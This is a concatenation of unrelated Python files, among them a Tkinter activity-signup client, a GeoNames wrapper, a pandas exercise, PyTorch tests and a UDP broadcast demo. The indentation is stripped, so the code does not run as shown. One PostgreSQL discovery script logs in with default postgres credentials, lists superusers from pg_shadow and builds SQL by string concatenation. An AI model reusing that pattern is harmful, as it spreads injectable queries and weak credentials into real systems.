else:
if get_token(acc, pwd):
return True
else:
messagebox.showwarning(title='出错了', message='请检查账号密码')
return False
def get_id(self):
self.get_ids(self.token, self.uid)
messagebox.showinfo('欢迎您', self.name)
names = []
for name, id, statusText in zip(self.names, self.ids, self.statusTexts):
names.append(name + ' {} {}'.format(id, statusText))
list1 = StringVar(value=names)
lb1 = tk.Listbox(app, listvariable=list1, height=len(names), width=67)
lb1.place(x=6, y=65)
def can_join(self):
names = ['可报名活动']
if self.get_can_join(self.token, self.uid):
for name, id, statusText in zip(self.names, self.ids, self.statusTexts):
names.append(name + ' {} {}'.format(id, statusText))
list1 = StringVar(value=names)
lb2 = tk.Listbox(app, listvariable=list1, height=len(names), width=67)
lb2.place(x=500, y=245)
else:
messagebox.showwarning('出错了', '没有活动')
def chiken(self):
id = id1.get()
res = self.get_info(id, self.token, self.uid)
if res:
app1 = tk.Toplevel(app)
app1.geometry('643x360')
app1.title('详细信息')
tk.Label(app1, text=res['data']['activityName'], font=('Arial', 14)).place(x=100, y=0)
tk.Label(app1, text='活动名称', font=('Arial', 14)).place(x=0, y=0)
tk.Label(app1, text=res['data']['address'], font=('Arial', 14)).place(x=100, y=25)
tk.Label(app1, text='活动地址', font=('Arial', 14)).place(x=0, y=25)
tk.Label(app1, text=res['data']['joindate'], font=('Arial', 14)).place(x=100, y=50)
tk.Label(app1, text='报名时间', font=('Arial', 14)).place(x=0, y=50)
tk.Label(app1, text=res['data']['startdate'], font=('Arial', 14)).place(x=100, y=75)
tk.Label(app1, text='活动时间', font=('Arial', 14)).place(x=0, y=75)
tk.Label(app1, text=res['data']['specialList'][0]['name'], font=('Arial', 14)).place(x=100, y=100)
tk.Label(app1, text='积分类型', font=('Arial', 14)).place(x=0, y=100)
tk.Label(app1, text=res['data']['specialList'][0]['unitcount'], font=('Arial', 14)).place(x=100, y=125)
tk.Label(app1, text='积分数量', font=('Arial', 14)).place(x=0, y=125)
else:
messagebox.showwarning(title='出错了', message='查询失败,请检查活动id')
def enter(self):
id = id2.get()
res = self.join(id, self.token, self.uid)
if res:
if res['code'] == '100':
messagebox.showinfo(title='报名详情', message='报名成功')
else:
messagebox.showinfo(title='报名详情', message=res['msg'])
else:
messagebox.showwarning(title='出错了', message='查询失败,请检查id')
def get_joined(self):
res = self.get_activity(self.token, self.uid)
names = []
ids = []
heights = ['已报名活动']
if res:
for li in res['data']['list']:
if li['statusText'] == '报名中':
names.append(li['name'])
ids.append(li['aid'])
if names:
for name, id in zip(names, ids):
heights.append(name + ' {}'.format(id))
list1 = StringVar(value=heights)
self.lb3 = tk.Listbox(app, listvariable=list1, height=len(heights), width=67)
self.lb3.place(x=500, y=105)
else:
messagebox.showwarning('出错了', '没有已报名活动')
def concle(self):
id = id3.get()
res = self.get_info(id, self.token, self.uid)
if res:
signUpId = str(res['data']['signUpId'])
if self.get_cancle(signUpId, self.token, self.uid)['code'] == '100':
messagebox.showinfo(title='成功', message='取消报名成功')
else:
messagebox.showwarning(title='出错了', message='失败,请检查活动id')
main = Main()
def login():
if main.login():
main.read()
main.get_id()
else:
None
def chiken():
if main.login():
main.read()
main.chiken()
else:
pass
def join():
if main.login():
main.read()
main.enter()
else:
pass
def can_join():
if main.login():
main.read()
main.can_join()
else:
pass
def joined():
if main.login():
main.read()
main.get_joined()
else:
pass
def concle():
if main.login():
main.read()
main.concle()
main.lb3.destroy()
else:
pass
b = tk.Button(app, text='登录查询', font=('Arial', 12), width=10, height=1, command=login)
b.place(x=380, y=12.5)
b1 = tk.Button(app, text='活动信息查询', font=('Arial', 12), width=10, height=1, command=chiken)
b1.place(x=720, y=0)
b2 = tk.Button(app, text='报名活动', font=('Arial', 12), width=10, height=1, command=join)
b2.place(x=720, y=32)
b2 = tk.Button(app, text='退出活动', font=('Arial', 12), width=10, height=1, command=concle)
b2.place(x=720, y=64)
b3 = tk.Button(app, text='查询已报名活动', font=('Arial', 12), width=12, height=1, command=joined)
b3.place(x=850, y=10)
b4 = tk.Button(app, text='查询可报名活动', font=('Arial', 12), width=12, height=1, command=can_join)
b4.place(x=850, y=52)
app.mainloop()
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
driver = webdriver.Chrome(executable_path='./chromedriver')
driver.get("http://tutorialsninja.com/demo/")
driver.close()
search_field = driver.find_element_by_name("search")
pass |
import logging
from cached_property import cached_property
from django.conf import settings
import requests
logger = logging.getLogger(__name__)
# NOTE: geonames code adapted and extended from winthrop project; will need
# to be spun off into its own library at some point down ther oad
class GeoNamesError(Exception):
'''Generic GeoNames response error'''
class GeoNamesUnauthorized(GeoNamesError):
'''GeoNames unauthorized response (raised when username is not set)'''
class GeoNamesAPI:
'''Minimal wrapper around GeoNames API. Currently supports simple
searching by name and generating a uri from an id. Expects
**GEONAMES_USERNAME** to be configured in django settings.'''
api_base = 'http://api.geonames.org'
# store country info on the *class* so it can be fetched once and shared
_countries = None
def __init__(self):
self.username = getattr(settings, "GEONAMES_USERNAME", None)
def call_api(self, method, params=None):
'''Generic method to handle calling geonames api and raising
an exception if an error occurred.'''
api_url = '/'.join([self.api_base, method])
if params is None:
params = {}
params['username'] = self.username
response = requests.get(api_url, params=params)
logger.debug('GeoNames %s: %s %s, %0.2f sec',
method, response.status_code, response.reason,
response.elapsed.total_seconds())
if response.status_code == requests.codes.ok:
# Unfortunately geonames api returns 200 codes for what
# should be errors, with message and status code in the response.
# See exception documentation for list of codes
# http://www.geonames.org/export/webservice-exception.html
data = response.json()
if 'status' in data:
if data['status']['value'] == 10:
raise GeoNamesUnauthorized(data['status']['message'])
else:
raise GeoNamesError(data['status']['message'])
return data
def search(self, query, max_rows=None, feature_class=None,
feature_code=None, name_start=False):
'''Search for places and return the list of results'''
api_method = 'searchJSON'
params = {'username': self.username}
# optionally use name start filter (e.g. for autocomplete)
if name_start:
params['name_startsWith'] = query
# otherwise, generic search term query
else:
params['q'] = query
if max_rows is not None:
params['maxRows'] = max_rows
if feature_class is not None:
params['featureClass'] = feature_class
if feature_code is not None:
params['featureCode'] = feature_code
return self.call_api(api_method, params)['geonames']
@classmethod
def uri_from_id(cls, geonames_id):
'''Convert a GeoNames id into a GeoNames URI'''
return 'http://sws.geonames.org/%d/' % geonames_id
@property
def countries(self):
'''Country information as returned by countryInfoJSON.'''
if GeoNamesAPI._countries is None:
api_method = 'countryInfoJSON'
GeoNamesAPI._countries = self.call_api(api_method)['geonames']
return GeoNamesAPI._countries
@cached_property
def countries_by_code(self):
'''Dictionary of country information keyed on two-letter code.'''
return {country['countryCode']: country for country in self.countries}
# def country_code(self):
# http://api.geonames.org/countryCode?lat=47.03&lng=10.2&username=demo&type=json
|
message = "This is a simple message"
print(message)
message = "This is an another simple message"
print(message) |
#!/usr/bin/env python
# coding: utf-8
# ## Module 2
#
# #### In this assignment, you will work on movie data from IMDB.
# - The data includes movies and ratings from the IMDB website
# - Data File(s): imdb.xlsx
#
# #### Data file contains 3 sheets:
# - “imdb”: contains records of movies and ratings scraped from IMDB website
# - “countries”: contains the country (of origin) names
# - “directors”: contains the director names
# In[67]:
###########################################################
### EXECUTE THIS CELL BEFORE YOU TO TEST YOUR SOLUTIONS ###
###########################################################
import imp, os, sys
sol = imp.load_compiled("solutions", "./solutions.py")
sol.get_solutions("imdb.xlsx")
from nose.tools import assert_equal
from pandas.util.testing import assert_frame_equal, assert_series_equal
# In[68]:
""" Q1:
Load and read the 'imdb.xlsx' file. Read the 'imdb' sheet into a DataFrame, df.
"""
import pandas as pd
# your code here
df = pd.read_excel('imdb.xlsx')
#xls = pd.ExcelFile('imdb.xlsx')
#df = xls.parse('imbd')
# In[69]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_frame_equal(df, sol.df)
print("Success!")
# In[70]:
""" Q2:
Store the dimensions of the DataFrame as a tuple in a variable called 'shape' and print it.
Hint: A tuple is made up of comma separated values inside parenthesis. e.g. (1, 2)
"""
# your codes here
shape = (df.shape)
print(shape)
# In[71]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_equal(shape, sol.shape)
print("Success!")
# In[72]:
df.head()
# In[73]:
""" Q3:
Store the column titles and the types of data in variables named 'columns' and 'dtypes', then print them.
"""
# your code here
#columns = (["movie_title"], ["director_id"], ["country_id"], ["content_rating"], ["title_year"], ["imdb_score"], ["gross"], ["duration"])
#columns = ["movie_title", "director_id", "country_id", "content_rating", "title_year", "imdb_score", "gross", "duration"]
columns = df.columns
dtypes = df.dtypes
print(columns)
print(dtypes)
# In[74]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_equal(columns.all(), sol.columns.all())
assert_series_equal(dtypes, sol.dtypes)
print("Success!")
# In[75]:
""" Q4:
Examine the first 10 rows of data; store them in a variable called first10
"""
# your code here
first10 = df.head(10)
print(first10)
# In[76]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_frame_equal(first10, sol.first10)
print("Success!")
# In[77]:
""" Q5:
Examine the first 5 rows of data; store them in a variable called first5
"""
# your code here
first5 = df.head(5)
print(first5)
# In[78]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_frame_equal(first5, sol.first5)
print("Success!")
# In[79]:
""" Q6:
Import the "directors" and "countries" sheets into their own DataFrames, df_directors and df_countries.
"""
# your code here
df_directors = pd.read_excel (r'imdb.xlsx', sheet_name='directors')
print (df_directors)
df_countries = pd.read_excel (r'imdb.xlsx', sheet_name = 'countries')
print(df_countries)
# In[80]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_frame_equal(df_directors, sol.df_directors)
assert_frame_equal(df_countries, sol.df_countries)
print("Success!")
# In[81]:
""" Q7:
Check the "directors" sheet
1. Count how many records there are based on the "id" column. (To get the number of records per "id",
use the value_counts method.) Store the result in a variable named count.
2. Remove the duplicates from the directors dataframe and store the result in a variable called df_directors_clean.
"""
# your code here
# In[82]:
count = df_directors["id"].value_counts()
print(count)
# In[83]:
df_directors.head()
# In[84]:
df_directors_clean = df_directors.drop_duplicates(subset =["director_name"])
df_directors_clean.head()
# In[85]:
##########################
### TEST YOUR SOLUTION ###
##########################
assert_series_equal(count, sol.count)
assert_frame_equal(df_directors_clean, sol.df_directors_clean)
print("Success!")
# In[ ]:
|
def magical_string(n):
string = string_gen(n)
return string.count('1')
def string_gen(n):
start = '122'
i = 2
alt = '1'
while len(start) < n:
if start[i] == '2':
start += alt * 2
else:
start += alt
if alt == '1':
alt = '2'
else:
alt = '1'
i += 1
return start[:n] |
# -*- coding: utf-8 -*-
'''
Created on 9 may. 2017
@author: jose
'''
import psycopg2
import time
def consulta (conn,sql):
cur=conn.cursor()
cur.execute(sql)
rows = cur.fetchall()
return rows
def ObtieneTipoTabla (tipo):
if tipo=='r':
cod='TBL'
else:
cod='VST'
return cod
def obtenerPrincipal(ip,user,password,port):
dic={}
try :
conn = psycopg2.connect( user=user, password=password, host=ip, port=port)
buf=consulta(conn,"select version()")
dic['version']=buf[0][0].split(',')[0]
buf=consulta(conn,"SELECT user from pg_shadow where usesuper='t';")
dic['admin']=buf[0][0]
dic['Esquema']=[]
lbd = consulta (conn, "select d.datname,u.usename from pg_database d,pg_user u where u.usesysid=d.datdba")
conn.close()
except :
print (time.strftime("%c")+"-- Error al conectar a la instancia de BBDD en la IP "+ ip)
return dic,lbd
def compruebaConexion(ip,puerto):
try :
conn = psycopg2.connect( user="u", password="p", host=ip, port=puerto)
except psycopg2.OperationalError:
Correcto = True
except :
Correcto = False
return Correcto
def descubre(ip,user,password,port):
dic,lbd=obtenerPrincipal(ip,user,password,port)
dic['Esquema']=[]
for bd in lbd:
d={}
try :
conn = psycopg2.connect( database=bd[0],user=user, password=password, host=ip, port=port)
except :
print (time.strftime("%c")+"-- Error de acceso a la instancia de BBDD " + bd[0])
continue
sql = "select distinct table_schema from information_schema.columns WHERE table_schema not in ( 'pg_catalog', 'information_schema')"
leqm= consulta(conn, sql)
for eqm in leqm :
d['nombre_db']=bd[0]
d['nombre']=eqm[0]
d['propietario']=bd[1]
d['Tablas']=[]
sql= "SELECT c.relname, (c.relkind ) FROM pg_class c LEFT JOIN pg_namespace n ON n.oid = c.relnamespace where c.relkind not in ('i','t','S') and n.nspname='" +eqm[0]+"'"
l_tb=consulta(conn,sql)
for tb in l_tb:
t={}
t['nombre']=tb[0]
t['tipo']= ObtieneTipoTabla(tb[1])
sql="SELECT DISTINCT column_name, data_type from information_schema.columns where table_schema ='"+eqm[0]+"' and table_name='"+tb[0]+"'"
l_at=consulta(conn,sql)
t['attTabla']=[]
for at in l_at:
a={}
a['nombre']= at[0]
a['indice']='False'
t['attTabla'].append(a.copy())
d['Tablas'].append(t.copy())
dic['Esquema'].append(d.copy())
conn.close()
return dic
if __name__ == '__main__':
descubre("192.168.1.20","postgres","postgres", 5432)
pass |
from django.shortcuts import render
from django.http import HttpResponse
from django.contrib.staticfiles.templatetags.staticfiles import static
from django.contrib.staticfiles import finders
import os
import urllib2 # the lib that handles the url stuff
def index(request):
return HttpResponse("Hello, world. You're at the polls index.")
# Create your views here.
def search_form(request):
#return HttpResponse("search_form.")
return render(request, 'search_form.html')
def search_postcode(request):
if 'postcode' in request.GET:
postcode = request.GET['postcode']
print "school function"
#print postcode
#url_file = static('Government-School-Locations.txt')
#print url_file
#data = urllib2.urlopen('https://github.com/ronniels92372/govhack2016/blob/master/Government-School-Locations.txt')
result = finders.find('Government-School-Locations.txt')
searched_locations = finders.searched_locations
#print searched_locations
file_path = os.path.join(searched_locations[1],'Government-School-Locations.txt')
with open(file_path) as f:
first_line = f.readline()
print first_line
first_line = f.readline()
lines = f.readlines()
for each_line in lines:
cols = each_line.split("\t")
school_name_col = cols[2]
postcode_col = cols[19]
total_enrollments = cols[10]
lat = cols[20]
long = cols[21]
if(str(postcode) == postcode_col):
print "---------------------"
print postcode_col
print school_name_col
print total_enrollments
print lat
print long
return HttpResponse("POST CODE.")
#return render(request, 'search_form.html')
|
import unittest
import math
import copy
from model.basic_operation import *
class TestAtma(unittest.TestCase):
def setUp(self) -> None:
self.mat = torch.tensor([[1.0, 1.0], [0.0, 1.0]])
self.batch_mat = self.mat.unsqueeze(0)
self.result = [[1.0, 1.0], [1.0, 2.0]]
def test_mat_multiply(self):
numpy_multi_result = atma(self.mat).cpu().numpy().tolist()
self.assertListEqual(self.result, numpy_multi_result)
def test_batch_mat_multiply(self):
numpy_multi_result = atma(self.batch_mat).numpy().tolist()
self.assertListEqual([self.result], numpy_multi_result)
class TestCalculateZeta(unittest.TestCase):
def setUp(self) -> None:
self.mu = torch.tensor([0.5])
self.sigma = torch.tensor([[2.0]])
self.lam = torch.tensor([[0.5]])
# eta = lam * mu
self.eta = torch.tensor([0.25])
def test_one_dim_zeta_with_mu(self):
zeta = float(calculate_zeta(self.eta, self.lam, mu=self.mu).numpy())
self.assertAlmostEqual(zeta, -1.32801212348)
def test_one_dim_zeta_with_sigma(self):
zeta = float(calculate_zeta(self.eta, self.lam, sig=self.sigma).numpy())
self.assertAlmostEqual(zeta, -1.32801212348)
class TestGaussianMulti(unittest.TestCase):
def setUp(self) -> None:
self.mu0 = torch.tensor([0.5])
self.sigma0 = torch.tensor([[2.0]])
self.mu1 = torch.tensor([1.0 / 3.0])
self.sigma1 = torch.tensor([[1.0]])
def test_one_dim_multiply(self):
score, mu, sigma = gaussian_multi(self.mu0, self.mu1, self.sigma0, self.sigma1)
self.assertAlmostEqual(sigma.item(), 2.0 / 3.0)
self.assertAlmostEqual(mu.item(), 7.0 / 18.0)
self.assertAlmostEqual(score.item(), - (0.5 * math.log(6 * math.pi) + 1.0 / 216.0))
class TestFastGaussianMulti(unittest.TestCase):
def setUp(self) -> None:
self.mu0 = torch.tensor([0.5])
self.sigma0 = torch.tensor([[2.0]])
self.mu1 = torch.tensor([1.0 / 3.0])
self.sigma1 = torch.tensor([[1.0]])
def test_one_dim_multiply(self):
score, mu, sigma = fast_gaussian_multi(self.mu0, self.mu1, self.sigma0, self.sigma1, diag0=True, diag1=True)
self.assertAlmostEqual(sigma.item(), 2.0 / 3.0)
self.assertAlmostEqual(mu.item(), 7.0 / 18.0)
self.assertAlmostEqual(score.item(), - (0.5 * math.log(6 * math.pi) + 1.0 / 216.0))
class TestGaussianMultiIntegral(unittest.TestCase):
def setUp(self) -> None:
self.mu0 = torch.tensor([0.5])
self.sigma0 = torch.tensor([[2.0]])
self.mu1 = torch.tensor([1.0, 2.0])
self.sigma1 = torch.tensor([[1.0, 0.5], [0.5, 1.0]])
def test_one_dim_forward(self):
score, mu, sigma = gaussian_multi_integral(self.mu1, self.mu0, self.sigma1, self.sigma0, forward=True)
# lam = np.array([[4.0 / 3.0, -2.0 / 3.0], [-2.0 / 3.0, 4.0 / 3.0]])
lam1 = np.linalg.inv(self.sigma1.detach().numpy())
lam = copy.copy(lam1)
lam[0][0] += 1.0 / self.sigma0.item()
golden_sigma = np.linalg.inv(lam)
self.assertAlmostEqual(golden_sigma[1][1], sigma.item())
eta0 = 1.0 / self.sigma0.item() * self.mu0.item()
eta1 = lam1.dot(self.mu1.detach().numpy())
eta = copy.copy(eta1)
eta[0] += eta0
golden_mu = golden_sigma.dot(eta)
self.assertAlmostEqual(golden_mu[1], mu.item())
zeta0 = -0.5 * (math.log(2 * math.pi) - np.log(1.0 / self.sigma0.item()) + eta0 * self.sigma0.item() * eta0)
zeta1 = -0.5 * (2 * math.log(2 * math.pi) - np.log(np.linalg.det(lam1)) + eta1.dot(self.sigma1.detach().numpy().dot(eta1)))
zeta = -0.5 * (2 * math.log(2 * math.pi) - np.log(np.linalg.det(lam)) + eta.dot(golden_sigma.dot(eta)))
golden_score = zeta0 + zeta1 - zeta
self.assertAlmostEqual(golden_score, score.item(), 6)
def test_one_dim_backward(self):
score, mu, sigma = gaussian_multi_integral(self.mu1, self.mu0, self.sigma1, self.sigma0, forward=False)
lam1 = np.linalg.inv(self.sigma1.detach().numpy())
lam = copy.copy(lam1)
lam[1][1] += 1.0 / self.sigma0.item()
golden_sigma = np.linalg.inv(lam)
self.assertAlmostEqual(golden_sigma[0][0], sigma.item(), 6)
eta0 = 1.0 / self.sigma0.item() * self.mu0.item()
eta1 = lam1.dot(self.mu1.detach().numpy())
eta = copy.copy(eta1)
eta[1] += eta0
golden_mu = golden_sigma.dot(eta)
self.assertAlmostEqual(golden_mu[0], mu.item(), 6)
zeta0 = -0.5 * (math.log(2 * math.pi) - np.log(1.0 / self.sigma0.item()) + eta0 * self.sigma0.item() * eta0)
zeta1 = -0.5 * (2 * math.log(2 * math.pi) - np.log(np.linalg.det(lam1)) + eta1.dot(
self.sigma1.detach().numpy().dot(eta1)))
zeta = -0.5 * (2 * math.log(2 * math.pi) - np.log(np.linalg.det(lam)) + eta.dot(golden_sigma.dot(eta)))
golden_score = zeta0 + zeta1 - zeta
self.assertAlmostEqual(golden_score, score.item(), 6)
if __name__ == '__main__':
unittest.main()
|
import csv
from .models import FinancialData, StatsData
def import_financial_data(request):
available_data = []
with open('/Users/Hannan/Documents/Projects/analytics_assistant/virtual_analyst/static/csv/2013.csv', 'r') as f:
rows = csv.reader(f)
headers = next(rows)
for row in rows:
monthly_dict = {}
month = row[0]
monthly_data = dict(zip(headers[1:], row[1:]))
monthly_dict[month] = monthly_data
available_data.append(monthly_dict)
month_counter = 0
for row in available_data:
for key, value in row.items():
month_counter += 1
FinancialData.objects.update_or_create(
financial_year_id=5,
financial_month_id=month_counter,
passenger_revenue=value['Passenger Revenue'],
cargo_revenue=value['Cargo Revenue'],
other_revenue=value['Other Revenue'],
aircraft_fuel=value['Fuel'],
aircraft_maintenance=value['Maintenance'],
commissions=value['Commission'],
ground_handling=value['Ground Handling'],
salaries_wages=value['Salaries and Wages'],
aircraft_lease=value['Aircraft Lease'],
overheads=value['Overheads'],
non_operating_items=value['Non-Operating']
)
def import_stats_data(request):
available_data = []
with open('/Users/Hannan/Documents/Projects/analytics_assistant/virtual_analyst/static/csv/2013_stats.csv', 'r') as f:
rows = csv.reader(f)
headers = next(rows)
for row in rows:
monthly_dict = {}
month = row[0]
monthly_data = dict(zip(headers[1:], row[1:]))
monthly_dict[month] = monthly_data
available_data.append(monthly_dict)
month_counter = 0
for row in available_data:
for key, value in row.items():
month_counter += 1
StatsData.objects.create(
financial_year_id=5,
financial_month_id=month_counter,
block_hours=value['Block Hours'],
flight_hours=value['Flight Hours'],
departures=value['Departures'],
rev_pax_miles=value['RPMs'],
avail_seat_miles=value['ASMs'],
fuel_gallons=value['Gallons'],
)
|
def hardestProblem(a, b, c):
if c<b and c<a:
print('Alice')
elif b<c and b<a:
print('Bob')
else:
print('Draw')
try:
t = int(input())
while t>0:
t -= 1
a, b, c = map(int, input().split())
hardestProblem(a, b, c)
except:
pass
|
a=[3,8,9,7,6]
b=3
c=b-1 #2
# key=a[0]
print(len(a))
output=[]
for i in range(0,len(a)):
if i<=c:
output.append( a[i+c])
# a[i-1]=a[i]
else:
output.append(a[i-b])
print(a)
print(output)
# key2=a[0]
# for j in range(0,len(a)):
# if j<len(a)-1:
# a[j]=a[j+1]
# else:
# a[j]=key2
# print(a)
# # output=[]
# # a=[3,8,9,7,6]
# # for i in range(0,len(a)):
# # if i<4:
# # i=i+1
# # output.append(a[i])
# # print(output)
|
from ortools_op import SolveMaxMatching
import numpy as np
def results2objective(results, nworkers, ntasks):
objective = np.zeros([nworkers, ntasks])
for i,j in results: objective[i][j]=1
return objective
def test1():
'''
Results :
unary potential :
[[ 0.89292312 0.64831936 0.56726688 0.13208358 0.05779465 0.48978515]
[ 0.83382476 0.08014071 0.61772549 0.95149459 0.04179085 0.92253984]
[ 0.76766159 0.6634347 0.91049119 0.6748744 0.17438728 0.51890275]
[ 0.90997762 0.18447894 0.81440657 0.09081913 0.46642204 0.47917976]
[ 0.72631254 0.94356716 0.05386514 0.57434492 0.69070927 0.39979905]]
objective :
[[ 1. 1. 0. 0. 0. 0.]
[ 0. 0. 0. 1. 0. 1.]
[ 0. 0. 1. 1. 0. 0.]
[ 1. 0. 1. 0. 0. 0.]
[ 0. 1. 0. 0. 1. 0.]]
'''
pairwise_lamb = 0.1
nworkers = 5
ntasks = 6
k = 2
mcf = SolveMaxMatching(nworkers=nworkers, ntasks=ntasks, k=k, pairwise_lamb=pairwise_lamb)
unary_potential = np.random.random([nworkers, ntasks])
mcf_results = mcf.solve(unary_potential)
objective = results2objective(results=mcf_results, nworkers=nworkers, ntasks=ntasks)
print("unary potential :\n{}".format(unary_potential))
print("objective :\n{}".format(objective))
if __name__ =='__main__':
test1()
|
i = 0
while i < 4:
if i > 2:
print(i)
elif i < 1:
print(i)
else:
print('hey')
i += 1
|
from dataclasses import dataclass
from typing import Callable
class Car:
"""
Generic car class
"""
def __init__(self, name: str, released_year: int, manufacturer: str, is_ev: bool, battery_range: int):
self.name = name
self.released_year = released_year
self.manufacturer = manufacturer
self.is_ev = is_ev
self.battery_range = battery_range
@dataclass
class CarSpecs:
name: str
released_year: int
manufacturer: str
is_ev: bool
battery_range: int
class DummyCarFactory:
@staticmethod
def build(specs: CarSpecs):
"""
Car builder method. To provide specs for the car and build it.
🚧 If the car is an EV, we need to have battery range information.
:return: a car instance
"""
if specs.is_ev:
return Car(specs.name, specs.released_year, specs.manufacturer, specs.is_ev, specs.battery_range)
else:
return Car(specs.name, specs.released_year, specs.manufacturer, specs.is_ev)
class CarFactory:
def build(self, specs: CarSpecs, is_ev: bool):
builder = self._get_builder(is_ev)
return builder(specs)
def _get_builder(self, is_ev: bool) -> Callable[[CarSpecs], Car]:
return self.build_ev_car if is_ev else self.build_non_ev_car
@staticmethod
def build_non_ev_car(specs: CarSpecs) -> Car:
return Car(specs.name, specs.released_year, specs.manufacturer, False, 0)
@staticmethod
def build_ev_car(specs: CarSpecs) -> Car:
return Car(specs.name, specs.released_year, specs.manufacturer, True, specs.battery_range)
|
string = input("Setning: ")
for char in string:
if char == "," or char == "." or char == '"' or char == "'" or char == "-" or char == "!":
string = string.replace(char,"")
print(string) |
from django.db import models
# Create your models here.
class Currencies(models.Model):
fullName = models.CharField(max_length=200)
Sign = models.CharField(max_length=200)
isActive = models.CharField(max_length=200)
updated_at = models.CharField(max_length=200)
created_at = models.CharField(max_length=200) |
#发送广播
from socket import *
import time
#广播地址
dest=("localhost",6666)
s=socket(AF_INET,SOCK_DGRAM)
s.setsockopt(SOL_SOCKET,SO_BROADCAST,1)
data="""asdfk
********************************
tarena@tarena:~$ ifconfig
enp2s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.40.74.131 netmask 255.255.255.0 broadcast 172.40.74.255
inet6 fe80::4105:814d:1719:4ae prefixlen 64 scopeid 0x20<link>
ether fc:aa:14:37:99:51 txqueuelen 1000 (以太网)
RX packets 62818 bytes 25438216 (25.4 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 65809 bytes 10980720 (10.9 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (本地环回)
RX packets 28960 bytes 4685374 (4.6 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 28960 bytes 4685374 (4.6 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
tarena@tarena:~$ ^C
tarena@tarena:~$
--------------------------------
"""
while True:
time.sleep(1)
s.sendto(data.encode(),dest)
|
import pandas as pd
import numpy as np
import seaborn as sns
from matplotlib import pyplot as plt
from sklearn.svm import SVC
from sklearn.decomposition import PCA
from sklearn.metrics import confusion_matrix
def pca_dim_reduction(x_train, x_test, total_variance = 0.95):
"""
Use PCA Transform To Extract Uncorrelated Features.
Params:
x_train -> Zero-mean training data
x_test -> (Estimated) Zero-mean testing data
y_train -> Training set labels
y_test -> Test set labels
total_variance -> Keep the transformed features whose
(ordered, ascending) cumulative
variance sum is less or equal to total_variance (trace
of the covariance matrix of the transformed features).
Use None to avoid dimentionallity reduction.
Output:
A tupple of np.array containing the transformed x_train, x_test
respectively.
Notes:
x_test should be normalized based on parameters calculated from x_train.
That is because x_test should be considered as unknown data.
Thus, this function computes the pca orthonormal matrix A based on
the observations of x_train. Then it transforms both x_train and x_test.
"""
pca = PCA(total_variance)
pca.fit(x_train)
return pca.transform(x_train), pca.transform(x_test)
if __name__ == '__main__':
x_train = pd.read_csv('X_Train.csv', index_col = 0)
x_test = pd.read_csv('X_Test.csv', index_col = 0)
y_train = pd.read_csv('Y_Train.csv', index_col = 0)
y_train = y_train[y_train.columns[-1]]
y_test = pd.read_csv('Y_Test.csv', index_col = 0)
y_test = y_test[y_test.columns[-1]]
# Model 1: PCA Transformation, Keep All Components #
x1_train, x1_test = pca_dim_reduction(x_train, x_test, None)
clf = SVC()
clf.fit(x1_train, y_train)
y_pred = clf.predict(x1_test)
CM = confusion_matrix(y_test, y_pred)
np.save('PCA1.npy', CM / np.sum(CM))
print('M1) Average Accuracy = %s' % (np.sum(np.diag(CM)) / np.sum(CM)))
# Model 2: PCA Transformation, Total_Variance = 0.99 #
x2_train, x2_test = pca_dim_reduction(x_train, x_test, 0.99)
clf = SVC()
clf.fit(x2_train, y_train)
y_pred = clf.predict(x2_test)
CM = confusion_matrix(y_test, y_pred)
np.save('PCA_0.99.npy', CM / np.sum(CM))
print('M2) Average Accuracy = %s' % (np.sum(np.diag(CM)) / np.sum(CM)))
# Model 3: PCA Transformation, Total_Variance = 0.95 #
x3_train, x3_test = pca_dim_reduction(x_train, x_test, 0.95)
clf = SVC()
clf.fit(x3_train, y_train)
y_pred = clf.predict(x3_test)
CM = confusion_matrix(y_test, y_pred)
np.save('PCA_0.95.npy', CM / np.sum(CM))
print('M3) Average Accuracy = %s' % (np.sum(np.diag(CM)) / np.sum(CM)))
|
try:
from _jep import *
except ImportError:
raise ImportError("Jep is not supported in standalone Python, it must be embedded in Java.")
from .version import __VERSION__, VERSION
from .java_import_hook import *
from .shared_modules_hook import *
|
# Standard libs:
import sys, re, os, pickle, copy, time, traceback, webbrowser
from optparse import OptionParser
from math import floor
from types import ListType
# BioPython modules:
from Bio.Nexus import Nexus, Trees, Nodes
from SAP import Fasta
# Custom modules:
from SAP import MachinePool, SGE, Options
from SAP.XML2Obj import XML2Obj
from SAP.Homology import HomolCompiler, HomologySet, Homologue
from SAP.TreeStatistics import TreeStatistics
from SAP.PairWiseDiffs import PairWiseDiffs
from SAP.ResultHTML import ResultHTML
from SAP.Initialize import Initialize
from SAP.UtilityFunctions import *
from SAP.FindPlugins import *
from SAP.InstallDependencies import assertClustalw2Installed, assertBlastInstalled
from SAP.PostAnalysis import IMa
from SAP.Exceptions import AnalysisTerminated
def sap():
try:
optionsParser = Options.Options()
options, args = optionsParser.postProcess()
if options.viewresults:
try:
webbrowser.open('file://' + os.path.abspath(os.path.join(options.viewresults, 'html', 'index.html')), new=2, autoraise=1)
except:
if os.path.exists(options.viewresults):
print "The anlysis has not completed and no results are available."
else:
print "The spcified project folder does not exist."
sys.exit()
if options.compile:
if os.path.exists(options.database):
print "Database already exists. Delete old database or use other name."
sys.exit()
from CompileDatabase import compileDatabase
compileDatabase(options.compile, options.email, options.database)
sys.exit()
if options.installdependencies:
print "Checking that dependencies are installed on your system."
from UtilityFunctions import findOnSystem
missing = False
if os.name in ('nt', 'dos'):
name = 'blastn.exe'
else:
name = 'blastn'
if not findOnSystem(name):
print "\nThis program depends on %s for searching databases. Automatic installation is not longer supported. You need to install this yourself from:\nftp.ncbi.nlm.nih.gov/blast/executables/blast+/LATEST\n\n" % name
missing = True
if os.name in ('nt', 'dos'):
name = 'clustalw2.exe'
else:
name = 'clustalw2'
if not findOnSystem(name):
